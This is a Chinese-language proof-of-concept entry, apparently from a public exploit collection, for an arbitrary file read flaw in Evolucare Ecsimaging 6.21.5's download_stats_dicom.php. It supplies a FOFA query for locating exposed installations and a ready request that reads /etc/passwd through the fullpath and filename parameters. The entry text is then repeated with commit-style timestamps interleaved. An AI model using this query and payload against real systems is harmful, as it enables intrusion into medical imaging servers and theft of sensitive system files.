Awesome-POC/Web应用漏洞/Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞.md

# Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞

## 漏洞描述

Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.

## 漏洞影响

```
EVOLUCARE Evolucare Ecsimaging 6.21.5
```

## FOFA

```
body="ECSimaging"
```

## 漏洞复现

登录页面

![](./images/202205241445840.png)

验证POC

```
/download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd
```

![](./images/202205241445607.png)
更新漏洞库：Web应用漏洞/ 2022-05-24 17:29:00 +08:00			`# Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞`

			`## 漏洞描述`

			`Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等.`

			`## 漏洞影响`

			```
			`EVOLUCARE Evolucare Ecsimaging 6.21.5`
			```

			`## FOFA`

			```
			`body="ECSimaging"`
			```

			`## 漏洞复现`

			`登录页面`

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202205241445840.png)`
更新漏洞库：Web应用漏洞/ 2022-05-24 17:29:00 +08:00
			`验证POC`

			```
			`/download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202205241445607.png)`